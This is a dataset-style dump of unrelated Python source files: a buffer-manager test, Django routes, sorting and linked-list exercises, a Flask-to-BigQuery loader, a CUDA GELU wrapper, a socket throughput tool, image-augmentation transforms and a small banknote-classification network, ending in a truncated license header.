text stringlengths 8 6.05M |
|---|
import os
from utils import utils
from BufferManager.bufferDS import PageData, PageHeader
from BufferManager.BufferManager import BufferManager
FILENAME = "test_1.db"
def create_file():
    """Create FILENAME as a 160-page test database file, if it does not exist.

    Layout: one header page (two int fields plus 0x01 padding), followed by
    FILE_PAGE data pages each holding its page id plus zero padding.
    Assumes utils.int_to_byte yields 4 bytes so pages are 8192 bytes -- confirm.
    """
    page_data = []
    if os.path.exists(FILENAME):
        return  # never overwrite an existing test file
    FILE_PAGE = 160
    for i in range(FILE_PAGE):
        page_data.append(utils.int_to_byte(i) + bytearray(b'\00' * 8188))
        # BUG FIX: slice was [0:11], which shows only 11 bytes despite the message.
        print("First 12 bytes of Page data {} is {}".format(i, page_data[i][0:12]))
    page_header = utils.int_to_byte(1) + utils.int_to_byte(FILE_PAGE) + bytearray(b'\x01'*8184)
    with open(FILENAME, "wb") as f:
        f.write(page_header)
        for i in range(FILE_PAGE):
            f.write(page_data[i])
def test_buffer():
    """Exercise the BufferManager fetch/pin/set/flush/remove cycle against the
    on-disk test file created by create_file()."""
    create_file()
    bm = BufferManager()
    # print(len(bm.buffer_blocks))
    print(len(BufferManager.buffer_blocks))
    pageheader = BufferManager._read_file_header(FILENAME)
    print(pageheader.size)
    # Fetch every page (pages are 1-indexed); pin the first 80 so they
    # cannot be evicted by the replacer.
    for i in range(pageheader.size):
        pagedata = BufferManager.fetch_page(FILENAME, i+1)
        if i+1 <= 80:
            BufferManager.pin(FILENAME, i+1)
        print("page no.{}, next_free_page: {}".format(i+1, pagedata.next_free_page))
        print("current buffer blocks: {}".format(len(bm.buffer_blocks)))
    print("total buffer blocks used: {}, replacer length: {}".format(len(BufferManager.buffer_blocks), BufferManager.replacer_len))
    # Overwrite every page with a 0xff payload, then flush buffers to disk.
    for i in range(pageheader.size):
        # block = BufferManager._search_buffer_block(FILENAME, i+1)
        # page_data = block.page
        page = bytearray(b'\xff' * 8184)
        new_page_data = PageData(4, page)
        BufferManager.set_page(FILENAME, i+1, new_page_data)
    BufferManager.flush_buffer()
    # Any page still resident in the buffer should now hold the new payload.
    for i in range(pageheader.size):
        block = BufferManager._search_buffer_block(FILENAME, i+1)
        if block is not None:
            print("block id: {}, page_data: {}".format(i+1, block.page.data[0:12]))
    BufferManager.remove_file(FILENAME)
    print(len(BufferManager.buffer_blocks))
def test_create_file():
    """Smoke-test BufferManager.create_file and read back the new header."""
    created = BufferManager.create_file("test1.db")
    file_header = BufferManager._read_file_header("test1.db")
    print(created)
    print(file_header.first_free_page)
    print(file_header.data)
"""
已测试:
fetch_page
pin
kick_out_victim_LRU
remove_file
set_page
_search_buffer_block
_read_file_header
write_back_to_file
create_file
"""
test_create_file()
# test_buffer() |
from . import views
from django.urls import path,include
# URL routes for this app: three HTML views plus JSON endpoints keyed by <id>.
urlpatterns = [
    path('',views.home,name='home' ),
    path('observation/',views.observation,name='observation' ),
    path('encounter/',views.encounter,name='encounter' ),
    path('jsonviewPatient/<id>/',views.jsonviewPatient, name='jsonviewPatient' ),
    path('jsonviewObservation/<id>/', views.jsonviewObservation, name='jsonviewObservation'),
    path('jsonviewEncounter/<id>/', views.jsonviewEncounter, name='jsonviewEncounter'),
    path('url/', views.url, name='url'),
]
a = list(map(int,input("Enter the elements of the list: ").split()))
def bubblesort(a):
    """Sort list *a* in place in ascending order via bubble sort; returns None."""
    for unsorted_end in range(len(a) - 1, 0, -1):
        for idx in range(unsorted_end):
            if a[idx] > a[idx + 1]:
                # Swap adjacent out-of-order elements.
                a[idx], a[idx + 1] = a[idx + 1], a[idx]
bubblesort(a)
# NOTE(review): the lines below duplicate the prompt/definition/sort above
# verbatim (likely a paste error); the first sorted list is read and sorted
# but never printed -- only this second pass produces output.
a = list(map(int,input("Enter the elements of the list: ").split()))
def bubblesort(a):
    # In-place ascending bubble sort (redefinition, identical to the above).
    for i in range(len(a)-1,0,-1):
        for j in range(i):
            if a[j] > a[j+1]:
                a[j] , a[j+1] = a[j+1] , a[j]
bubblesort(a)
print(a)
from flask import Blueprint
from flask import jsonify
from shutil import copyfile, move
from google.cloud import storage
from google.cloud import bigquery
import dataflow_pipeline.cesde.hora_hora_beam as cesde_beam
import os
import socket
import shutil
import time
# coding=utf-8  -- NOTE(review): encoding declarations only take effect on the
# first or second line of a file; this one is inert here.
cesde_api = Blueprint('cesde_api', __name__)
# Pick the local mount point when running on the "contentobi" host, the UNC
# network path otherwise (bool indexes the 2-tuple).
fileserver_baseroute = ("//192.168.20.87", "/media")[socket.gethostname()=="contentobi"]
@cesde_api.route("/hora_hora")
def hora_hora():
response = {}
response["code"] = 400
response["description"] = "No se encontraron ficheros"
response["status"] = False
local_route = fileserver_baseroute + "/BI_Archivos/GOOGLE/Cesde/Procesado/"
archivos = os.listdir(local_route)
for archivo in archivos:
if archivo.endswith(".csv"):
Fecha = str(archivo[21:])
Fecha = Fecha.replace(".csv","")
storage_client = storage.Client()
bucket = storage_client.get_bucket('ct-cesde')
nombre = 'gs://ct-cesde/' + archivo
# Subir fichero a Cloud Storage antes de enviarlo a procesar a Dataflow
blob = bucket.blob(archivo)
blob.upload_from_filename(local_route + archivo)
try:
deleteQuery = "DELETE FROM `contento-bi.cesde.hora_hora` WHERE SUBSTR(Fecha_de_inicio,0,10) = '" + Fecha + "'"
client = bigquery.Client()
query_job = client.query(deleteQuery)
query_job.result()
except:
print("no se encontraron datos para eliminar.")
mensaje = cesde_beam.run(nombre, Fecha)
time.sleep(30)
# shutil.rmtree(local_route + archivo)
blob.delete()
return jsonify(response), response["code"]
|
import math
import os.path
import torch
import torch.nn as nn
from torch.utils.cpp_extension import load
# Absolute path to the CUDA source compiled below.
_path = os.path.join(
    os.path.abspath(os.path.dirname(__file__)), "csrc/gpt_gelu_cuda.cu"
)
# JIT-compile the extension at import time (requires nvcc and a CUDA device).
_gelu = load(
    name="gelu",
    sources=[_path],
    extra_cflags=['-O3'],
    extra_cuda_cflags=["-O3", "--use_fast_math"]
)
class _GPT_GELU(torch.autograd.Function):
    """Autograd wrapper around the JIT-compiled CUDA GELU kernels."""
    @staticmethod
    def forward(ctx, X):
        # Keep X for the backward pass; the backward kernel takes it
        # together with the incoming gradient.
        ctx.save_for_backward(X)
        Y = _gelu.gpt_gelu_forward(X)
        return Y
    @staticmethod
    def backward(ctx, dY):
        X = ctx.saved_tensors[0]
        dX = _gelu.gpt_gelu_backward(dY, X)
        return dX
# Public functional entry point: gpt_gelu(x) -> tensor.
gpt_gelu = _GPT_GELU.apply
import os
import socket
import SocketServer
import time
import thread
import random
import select
from Traffic import *
def gen_buf(size=1024*1024):
    """Return a zero-filled str buffer of at least *size* bytes (Python 2;
    rounds up to the next multiple of 16)."""
    # return ''.join(['%c'%random.randint(0, 255) for n in xrange(size)])
    return ''.join(['\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0' for n in xrange(size / 16 + 1)])
class TrafficSock:
    """Python 2 helper socket that can source or sink bulk traffic."""
    def __init__(self, sock=None, buf=None):
        # Prefer IPv6, falling back to IPv4 when unavailable.
        if sock == None:
            try:
                self.sock = socket.socket(socket.AF_INET6)
            except:
                self.sock = socket.socket(socket.AF_INET)
        else:
            self.sock = sock
        # Default payload: 1 MiB of zeros.
        if buf == None:
            self.buf = gen_buf(1024*1024)
        else:
            self.buf = buf
        self.rcvsize = 1024*1024
        # Activity flags read by TrafficServerSock to decide when to close.
        self.sink_active = False
        self.source_active = False
    def active_open(self, addr):
        # Client-side connect.
        self.sock.connect(addr)
    def passive_open(self, rmt_host=None):
        # Accept one connection (optionally only from rmt_host), then replace
        # the listening socket with the accepted one.
        self.sock.listen(1)
        while True:
            (newsock, newaddr) = self.sock.accept()
            if rmt_host == None or newaddr[0] == rmt_host:
                break
            newsock.close()
        self.sock.close()
        self.sock = newsock
    def sink(self, maxbytes=None, maxtime=None):
        """Receive until the byte/time limit is hit or the peer closes."""
        self.sink_active = True
        bytes = 0
        start_time = time.time()
        while (maxbytes == None or bytes < maxbytes) and \
              (maxtime == None or time.time() - start_time < maxtime):
            n = self.rcvsize
            if maxbytes != None:
                n = min(n, maxbytes - bytes)
            # MSG_WAITALL: block until n bytes arrive (or EOF).
            n = len(self.sock.recv(n, socket.MSG_WAITALL))
            bytes += n
            if n == 0:
                break
        self.sink_active = False
    def source(self, maxbytes=None, maxtime=None):
        """Send the prepared buffer repeatedly until a limit is hit."""
        self.source_active = True
        bytes = 0
        start_time = time.time()
        while (maxbytes == None or bytes < maxbytes) and \
              (maxtime == None or time.time() - start_time < maxtime):
            n = len(self.buf)
            if maxbytes != None:
                n = min(n, maxbytes - bytes)
            bytes += self.sock.send(self.buf[:n])
        self.source_active = False
class TrafficServerSock:
    """Python 2 accept-loop server that sinks and/or sources traffic on each
    accepted connection, inline or on worker threads."""
    def __init__(self, laddr, buf=None, sink=True, source=False, \
                 spawn=True, ns_cb=None):
        self.laddr = laddr          # local (host, port) to bind
        self.buf = buf              # payload for sourcing (None -> default)
        self.sink = sink            # drain incoming data per connection
        self.source = source        # send data per connection
        self.spawn = spawn          # handle each connection on new threads
        self.ns_cb = ns_cb          # optional callback(sock, addr) on accept
        self.done = False
    def sink_close(self, ts):
        """Drain *ts*, closing it once neither direction is active."""
        ts.sink()
        # BUG FIX: was `ts.souce_active`, which raised AttributeError and
        # (on the spawned thread) silently leaked the socket.
        if not (ts.sink_active or ts.source_active):
            ts.sock.close()
    def source_close(self, ts):
        """Send through *ts*, closing it once neither direction is active."""
        ts.source()
        if not (ts.sink_active or ts.source_active):
            ts.sock.close()
    def serve(self):
        """Accept connections until stop() is called; wrap each accepted
        socket in a TrafficSock and sink/source it per configuration."""
        self.lsock = socket.socket()
        self.lsock.bind(self.laddr)
        self.lsock.listen(5)
        while not self.done:
            (sock, addr) = self.lsock.accept()
            if self.ns_cb != None:
                self.ns_cb(sock, addr)
            ts = TrafficSock(sock, self.buf)
            if self.spawn:
                if self.sink:
                    thread.start_new_thread(self.sink_close, (ts,))
                if self.source:
                    thread.start_new_thread(self.source_close, (ts,))
            else:
                if self.sink:
                    self.sink_close(ts)
                if self.source:
                    self.source_close(ts)
    def stop(self):
        # serve() re-checks the flag after the next accepted connection.
        self.done = True
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 16/5/1 下午7:42
# @Author : ZHZ
import nltk
from nltk.collocations import *
from nltk.metrics import TrigramAssocMeasures, spearman_correlation, ranks_from_scores, BigramAssocMeasures
from nltk.corpus import stopwords, webtext
text = "hello world I love you hello world hello world I"
#
# scorer = BigramAssocMeasures.likelihood_ratio
# compare_scorer = BigramAssocMeasures.raw_freq
#
# while True:
# words = "hello world I love you hello world hello world I"
# cf = BigramCollocationFinder.from_words(words)
# cf.apply_freq_filter(3)
#
# corr = spearman_correlation(ranks_from_scores(cf.score_ngrams(scorer)),
# ranks_from_scores(cf.score_ngrams(compare_scorer)))
# print(file)
# print('\t', [' '.join(tup) for tup in cf.nbest(scorer, 15)])
# print('\t Correlation to %s: %0.4f' % (compare_scorer.__name__,
# corr)) # text= "Everyone has their own dreams, I am the same. But my dream is not a lawyer, not a doctor, not actors, not even an industry. Perhaps my dream big people will find it ridiculous, but this has been my pursuit! My dream is to want to have a folk life! I want it to become a beautiful painting, it is not only sharp colors, but also the colors are bleak, I do not rule out the painting is part of the black, but I will treasure these bleak colors! Not yet, how about, a colorful painting, if not bleak, add color, how can it more prominent American? Life is like painting, painting the bright red color represents life beautiful happy moments. Painting a bleak color represents life difficult, unpleasant time. You may find a flat with a beautiful road is not very good yet, but I do not think it will. If a person lives flat then what is the point? Life is only a short few decades, I want it to go Finally, Each memory is a solid."
# break
trigram_measures = nltk.collocations.TrigramAssocMeasures()
finder = TrigramCollocationFinder.from_words(text.split())
print finder.nbest(trigram_measures.chi_sq, 2)
print finder.score_ngrams(TrigramAssocMeasures.mi_like)
#
# bigram_measures = nltk.collocations.BigramAssocMeasures()
# finder = BigramCollocationFinder.from_words(text.split())
# print finder.nbest(bigram_measures.student_t, 2)
# print finder.score_ngrams(BigramAssocMeasures.mi_like)
|
# BSD 3-Clause License.
#
# Copyright (c) 2019-2023 Robert A. Milton. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
""" **Context managers** """
from __future__ import annotations
from romcomma.base.definitions import *
from time import time
from datetime import timedelta
from contextlib import contextmanager
@contextmanager
def Timer(name: str = '', is_inline: bool = True):
    """ Context Manager for timing operations.
    Args:
        name: The name of this context, ``print``ed as what is being timed. The (default) empty string will not be timed.
        is_inline: Whether to report timing inline (the default), or with linebreaks to top and tail a paragraph.
    """
    started = time()
    if name:
        # Inline mode holds the line open so the duration lands beside it.
        if is_inline:
            print(f'Running {name}', end='', flush=True)
        else:
            print(f'Running {name}...')
    yield
    if name:
        elapsed = timedelta(seconds=int(time() - started))
        report = f' took {elapsed}.' if is_inline else f'...took {elapsed}.'
        print(report)
@contextmanager
def Environment(name: str = '', device: str = '', **kwargs):
    """ Context Manager setting up the environment to run operations.
    Args:
        name: The name of this context, ``print``ed as what is being run. The (default) empty string will not be timed.
        device: The device to run on. If this ends in the regex ``[C,G]PU*`` then the logical device ``/[C,G]PU*`` is used,
            otherwise device allocation is automatic.
        **kwargs: Is passed straight to the implementation GPFlow manager. Note, however, that ``float=float32`` is inoperative due to SciPy.
            ``eager=bool`` is passed to `tf.config.run_functions_eagerly <https://www.tensorflow.org/api_docs/python/tf/config/run_functions_eagerly>`_.
    """
    with Timer(name):
        # Force float64 (float32 is inoperative due to SciPy, per docstring).
        kwargs = kwargs | {'float': 'float64'}
        eager = kwargs.pop('eager', None)
        tf.config.run_functions_eagerly(eager)
        print(' using GPFlow(' + ', '.join([f'{k}={v!r}' for k, v in kwargs.items()]), end=')')
        # Map a trailing CPU*/GPU* suffix onto an explicit tf logical device.
        # NOTE(review): if neither 'CPU' nor 'GPU' occurs, rfind gives -1 and
        # this keeps only the last character of *device* -- confirm intended.
        device = '/' + device[max(device.rfind('CPU'), device.rfind('GPU')):]
        if len(device) > 3:
            device_manager = tf.device(device)
            print(f' on {device}', end='')
        else:
            # No recognised device: an unnamed Timer acts as a null context.
            device_manager = Timer()
        implementation_manager = gf.config.as_context(gf.config.Config(**kwargs))
        print('...')
        with device_manager:
            with implementation_manager:
                yield
        print('...Running ' + name, end='')
|
import numpy as np
from batchgenerators.augmentations.utils import rotate_coords_3d, rotate_coords_2d, scale_coords, \
elastic_deform_coordinates, create_zero_centered_coordinate_mesh, interpolate_img
class MirrorTransform(object):
    """Axis-flip augmentation for 3-D arrays."""
    def augment_mirroring(self, data, code=(1, 1, 1)):
        """Flip *data* in place along each leading axis whose code flag is 1;
        returns the (mutated) array."""
        for axis, flag in enumerate(code):
            if flag == 1:
                data[:] = np.flip(data, axis=axis)
        return data
    def rand_code(self):
        """Draw three independent 0/1 flags, each 1 with probability 0.5."""
        return [1 if np.random.uniform() < 0.5 else 0 for _ in range(3)]
class SpatialTransform(object):
    """Random elastic-deformation / rotation / scaling augmentation.

    rand_coords() draws a randomly deformed sampling mesh for a patch;
    augment_spatial() resamples an array through that mesh.
    """
    def __init__(self, patch_center_dist_from_border=30,
                 do_elastic_deform=True, alpha=(0., 1000.), sigma=(10., 13.),
                 do_rotation=True, angle_x=(0, 2 * np.pi), angle_y=(0, 2 * np.pi), angle_z=(0, 2 * np.pi),
                 do_scale=True, scale=(0.75, 1.25), border_mode_data='nearest', border_cval_data=0, order_data=3,
                 border_mode_seg='constant', border_cval_seg=0, order_seg=0, random_crop=True, data_key="data",
                 label_key="seg", p_el_per_sample=1, p_scale_per_sample=1, p_rot_per_sample=1,
                 independent_scale_for_each_axis=False, p_rot_per_axis:float=1):
        # p_*_per_sample gate each augmentation per call; p_rot_per_axis gates
        # each rotation axis.  NOTE(review): random_crop and
        # patch_center_dist_from_border are stored/accepted but never used in
        # this class -- confirm.
        self.independent_scale_for_each_axis = independent_scale_for_each_axis
        self.p_rot_per_sample = p_rot_per_sample
        self.p_scale_per_sample = p_scale_per_sample
        self.p_el_per_sample = p_el_per_sample
        self.data_key = data_key
        self.label_key = label_key
        self.patch_center_dist_from_border = patch_center_dist_from_border
        self.do_elastic_deform = do_elastic_deform
        self.alpha = alpha
        self.sigma = sigma
        self.do_rotation = do_rotation
        self.angle_x = angle_x
        self.angle_y = angle_y
        self.angle_z = angle_z
        self.do_scale = do_scale
        self.scale = scale
        self.border_mode_data = border_mode_data
        self.border_cval_data = border_cval_data
        self.order_data = order_data
        self.border_mode_seg = border_mode_seg
        self.border_cval_seg = border_cval_seg
        self.order_seg = order_seg
        self.p_rot_per_axis = p_rot_per_axis
    def augment_spatial(self, data, coords, is_label=False):
        """Resample *data* through the coordinate mesh *coords*.

        Labels use the seg interpolation settings (default order 0) so class
        ids are not blended; images use the data settings.
        """
        if is_label:
            order = self.order_seg
            border_mode = self.border_mode_seg
            border_cval = self.border_cval_seg
        else:
            order= self.order_data
            border_mode = self.border_mode_data
            border_cval = self.border_cval_data
        data = interpolate_img(data, coords, order, border_mode, cval=border_cval)
        return data
    def rand_coords(self, patch_size):
        """Build a randomly deformed/rotated/scaled sampling mesh for a patch.

        NOTE(review): the final centring indexes patch_size[2] and adds three
        new axes, so despite the 2-D rotation branch this only works for 3-D
        patch sizes -- confirm.
        """
        dim = len(patch_size)
        coords = create_zero_centered_coordinate_mesh(patch_size)
        if self.do_elastic_deform and np.random.uniform() < self.p_el_per_sample:
            a = np.random.uniform(self.alpha[0], self.alpha[1])
            s = np.random.uniform(self.sigma[0], self.sigma[1])
            coords = elastic_deform_coordinates(coords, a, s)
        if self.do_rotation and np.random.uniform() < self.p_rot_per_sample:
            # Each axis rotates independently with probability p_rot_per_axis.
            if np.random.uniform() <= self.p_rot_per_axis:
                a_x = np.random.uniform(self.angle_x[0], self.angle_x[1])
            else:
                a_x = 0
            if dim == 3:
                if np.random.uniform() <= self.p_rot_per_axis:
                    a_y = np.random.uniform(self.angle_y[0], self.angle_y[1])
                else:
                    a_y = 0
                if np.random.uniform() <= self.p_rot_per_axis:
                    a_z = np.random.uniform(self.angle_z[0], self.angle_z[1])
                else:
                    a_z = 0
                coords = rotate_coords_3d(coords, a_x, a_y, a_z)
            else:
                coords = rotate_coords_2d(coords, a_x)
        if self.do_scale and np.random.uniform() < self.p_scale_per_sample:
            if not self.independent_scale_for_each_axis:
                # Zoom out with p=0.5 (when scale[0] allows), else zoom in.
                if np.random.random() < 0.5 and self.scale[0] < 1:
                    sc = np.random.uniform(self.scale[0], 1)
                else:
                    sc = np.random.uniform(max(self.scale[0], 1), self.scale[1])
            else:
                sc = []
                for _ in range(dim):
                    if np.random.random() < 0.5 and self.scale[0] < 1:
                        sc.append(np.random.uniform(self.scale[0], 1))
                    else:
                        sc.append(np.random.uniform(max(self.scale[0], 1), self.scale[1]))
            coords = scale_coords(coords, sc)
        # Shift the zero-centred mesh to the patch centre.
        ctr = np.asarray([patch_size[0]//2, patch_size[1]//2, patch_size[2]//2])
        coords += ctr[:, np.newaxis, np.newaxis, np.newaxis]
        return coords
class Crop(object):
    """Extract a fixed-size sub-volume from a 3-D array."""
    def __init__(self, patch_size):
        self.patch_size = patch_size
    def augment_crop(self, data, code=(1, 1, 1)):
        """Return the patch of self.patch_size whose corner is *code* (z, y, x)."""
        z, y, x = code
        dz, dy, dx = self.patch_size
        return data[z:z + dz, y:y + dy, x:x + dx]
    def rand_code(self, shape):
        """Pick a random valid corner [z, y, x] for a patch inside *shape*.

        Draw order (x, y, z) matches the original to keep the RNG stream identical.
        """
        n_x = np.random.randint(0, shape[2] - self.patch_size[2], 1)[0]
        n_y = np.random.randint(0, shape[1] - self.patch_size[1], 1)[0]
        n_z = np.random.randint(0, shape[0] - self.patch_size[0], 1)[0]
        return [n_z, n_y, n_x]
|
class Solution(object):
    """Linked-list cycle detection via Floyd's tortoise-and-hare."""
    def hasCycle(self, head):
        """Return True iff the list starting at *head* contains a cycle."""
        slow = fast = head
        # The fast pointer advances two nodes per step; in a cycle it must
        # eventually land on the slow pointer.
        while fast is not None and fast.next is not None:
            slow = slow.next
            fast = fast.next.next
            if slow == fast:
                return True
        # fast reached the end of the list: no cycle.
        return False
class Solution(object):
    """Cycle detection by destructively marking visited nodes.

    NOTE: overwrites every visited node's ``val`` with 'C', and reports a
    false positive if any node already holds 'C'.
    """
    def hasCycle(self, head):
        """Return True iff traversal revisits a marked node."""
        node = head
        while node is not None:
            if node.val == 'C':
                # Already marked: we have been here before.
                return True
            node.val = 'C'
            node = node.next
        return False
import datetime
# Print week numbers 63..3677, each with its start and end date, advancing
# both dates by seven days per row.
first_day = datetime.date(2016, 10, 9)
last_day = datetime.date(2016, 10, 15)
one_week = datetime.timedelta(weeks=1)
OUTPUT_FORMAT = '%m/%d/%Y'
for week_no in range(63, 3678):
    print('week %d: %s-%s' %
          (week_no, first_day.strftime(OUTPUT_FORMAT), last_day.strftime(OUTPUT_FORMAT)))
    first_day += one_week
    last_day += one_week
|
# Read n and target k, then a list of ints; print "yes" iff two entries at
# different indexes sum to k, "no" otherwise.
n, k = map(int, input().split())
li = list(map(int, input().split()))
a = 0
# O(n) replacement for the original O(n^2) double loop (whose `break` only
# exited the inner loop): remember values seen so far -- a complement hit
# means two distinct positions sum to k, including duplicate values.
seen = set()
for x in li[:n]:
    if k - x in seen:
        a = 1
        break
    seen.add(x)
print("yes" if a else "no")
|
import requests
def urlunshorten(url):
    """Follow every HTTP redirect for *url* and return the final URL."""
    response = requests.head(url, allow_redirects=True)
    return response.url
|
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 1 00:56:35 2019
@author: sazid
"""
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import sklearn
import sklearn.datasets
import sklearn.linear_model
from sklearn.model_selection import train_test_split
def relu(Z):
    """Element-wise rectified linear unit: max(0, Z)."""
    return np.clip(Z, 0, None)
def sigmoid(Z):
    """Element-wise logistic sigmoid, 1 / (1 + e^-Z)."""
    return 1.0 / (1.0 + np.exp(-Z))
def propagate( w, b, X, Y):
    """One forward/backward pass of the single-unit model.

    Args:
        w: weights, shape (features, 1);  b: scalar bias.
        X: data, shape (features, m);     Y: labels, shape (1, m).
    Returns:
        (grads, cost) where grads = {"dw", "db"} and cost is a scalar.

    NOTE(review): the activation is relu while the cost is binary
    cross-entropy (log(A), log(1-A)); A outside (0, 1) yields nan/inf, and
    the unused sigmoid above looks like the intended activation -- confirm.
    """
    m = X.shape[1]
    Z = np.dot( w.T, X) + b
    A = relu(Z)
    # Binary cross-entropy averaged over the m examples.
    cost = (-1/m)* np.sum( (Y * np.log(A)) + ((1 - Y)* np.log(1 - A)) )
    # Gradients of the logistic loss with respect to w and b.
    dZ = A - Y
    dw = (1/m)* np.dot(X, dZ.T)
    db = (1/m)* np.sum(dZ)
    assert(dw.shape == w.shape)
    assert(db.dtype == float)
    cost = np.squeeze(cost)
    assert(cost.shape == ())
    grads = {"dw": dw, "db" : db}
    return grads, cost
def optimize(w, b, X, Y, iteration, learning_rate, print_cost = True):
    """Plain batch gradient descent on the single-unit model.

    Args:
        w, b: initial weights and bias.
        X, Y: training data and labels.
        iteration: number of update steps.
        learning_rate: step size.
        print_cost: when True, echo the cost every 100 steps.
    Returns:
        (params, grads, costs): final {"w","b"}, the last {"dw","db"}, and
        the cost sampled once every 100 iterations.
    """
    costs = []
    for step in range(iteration):
        grads, cost = propagate(w, b, X, Y)
        dw, db = grads["dw"], grads["db"]
        # Descend along the gradient.
        w = w - (learning_rate*dw)
        b = b - (learning_rate*db)
        if step % 100 == 0:
            costs.append(cost)
            if print_cost:
                print ("Cost after iteration %i: %f" %(step, cost))
    params = {"w": w, "b": b}
    grads = {"dw": dw, "db": db}
    return params, grads, costs
def initialize_parameters(dim, fan_in=960):
    """Xavier-initialise a (dim, 1) weight column and a zero bias.

    Args:
        dim: number of input features.
        fan_in: denominator of the Xavier scale sqrt(1/fan_in).  Defaults to
            960 (the training-set size hard-coded in the original) so existing
            callers get byte-identical behaviour; pass the real fan-in to
            generalise.
    Returns:
        (w, b) with w.shape == (dim, 1) and b == 0.
    """
    # Xavier initialization: standard normals scaled by sqrt(1 / fan_in).
    # (HE initialization would use sqrt(2 / fan_in) instead.)
    w = np.random.randn(dim , 1)*np.sqrt(1/fan_in)
    b = 0
    assert(w.shape == (dim, 1))
    assert(isinstance(b, float) or isinstance(b, int))
    return w, b
def predict( w, b, X):
    """Threshold the model's relu activations at 0.5 to produce 0/1 labels.

    Args:
        w: weights (reshaped to (features, 1));  b: bias.
        X: data, shape (features, m).
    Returns:
        A (1, m) float array of 0.0/1.0 predictions.

    NOTE(review): b is accepted but not added to Z, matching the original.
    """
    m = X.shape[1]
    Y_prediction = np.zeros((1,m))
    w = w.reshape(X.shape[0], 1)
    A = relu(np.dot( w.T, X))
    # Convert each activation into a hard 0/1 decision at threshold 0.5.
    for col in range(A.shape[1]):
        if A[0, col] > 0.5:
            Y_prediction[0, col] = 1
        else:
            Y_prediction[0, col] = 0
    assert(Y_prediction.shape == (1, m))
    return Y_prediction
def NN_model_zero(X_train, Y_train, X_test, Y_test, iteration, learning_rate):
    """Train the single-unit model and report train/test accuracy.

    Args:
        X_*: data in (features, m) layout;  Y_*: labels in (1, m) layout.
        iteration, learning_rate: passed through to optimize().
    Returns:
        Dict with costs, both prediction arrays, learned w/b and the
        hyper-parameters used.
    """
    hidden_layer = 1;  # bookkeeping only -- unused in this single-unit model
    hidden_unit = 1;
    # Number of input features; hard-coded to the banknote dataset below.
    dim = 4
    w, b = initialize_parameters(dim)
    parameters, grads, costs = optimize(w, b, X_train, Y_train, iteration, learning_rate, print_cost = True)
    w = parameters["w"]
    b = parameters["b"]
    Y_prediction_test = predict(w , b, X_test)
    Y_prediction_train = predict(w, b, X_train)
    print("Y_prediction_train_shape = " + str(Y_prediction_train.shape))
    # Accuracy = 100 minus mean absolute 0/1 prediction error, in percent.
    print("train accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))
    print("test accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))
    d = {"costs": costs,
         "Y_prediction_test": Y_prediction_test,
         "Y_prediction_train" : Y_prediction_train,
         "w" : w,
         "b" : b,
         "learning_rate" : learning_rate,
         "iteration": iteration}
    return d
def data_input_and_process_function():
    """Load the banknote-authentication dataset, split 70/30, reshape to
    column layout and standardise each split.

    Returns:
        (train_set_X, test_set_X, train_set_Y, test_set_Y) with X in
        (4, m) and Y in (1, m) layout.

    NOTE(review): the reshapes hard-code a 1372-row input file and the 0.3
    split (960/412); any other input size raises.  Also, reshape on a
    (960, 4) array reorders elements row-major rather than transposing --
    `.T` may have been intended; confirm against training results.
    """
    a = np.loadtxt("/kaggle/input/data_banknote_authentication.txt",delimiter=',')
    # Column 4 is the 0/1 label; the remaining 4 columns are features.
    y = np.array(a[:,4]).reshape(1372,1)
    a = np.delete(a, 4, 1)
    train_set_X, test_set_X, train_set_Y, test_set_Y = train_test_split(a, y, test_size=0.3)
    # Reshape into (features, m) / (1, m) layout (see NOTE above).
    train_set_X = train_set_X.reshape(4, 960)
    test_set_X = test_set_X.reshape(4, 412)
    train_set_Y = train_set_Y.reshape(1, 960)
    test_set_Y = test_set_Y.reshape(1, 412)
    # Standardise each split to zero mean / unit std (global, not per-feature).
    train_set_X = train_set_X - np.mean(train_set_X)
    train_set_X = train_set_X / np.std(train_set_X)
    test_set_X = test_set_X - np.mean(test_set_X)
    test_set_X = test_set_X / np.std(test_set_X)
    return train_set_X, test_set_X, train_set_Y, test_set_Y
def main_func_call():
    """Train with fixed hyper-parameters and plot the sampled cost curve."""
    train_set_X, test_set_X, train_set_Y, test_set_Y = data_input_and_process_function()
    d = NN_model_zero(train_set_X, train_set_Y, test_set_X, test_set_Y, iteration = 9500, learning_rate = 0.001)
    # costs holds one sample per 100 iterations (see optimize()).
    costs = np.squeeze(d['costs'])
    plt.plot(costs)
    plt.ylabel('cost')
    plt.xlabel('iterations (per hundreds)')
    plt.title("Learning rate =" + str(d["learning_rate"]))
    plt.show()
# Run the full pipeline on import/execution.
main_func_call()
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
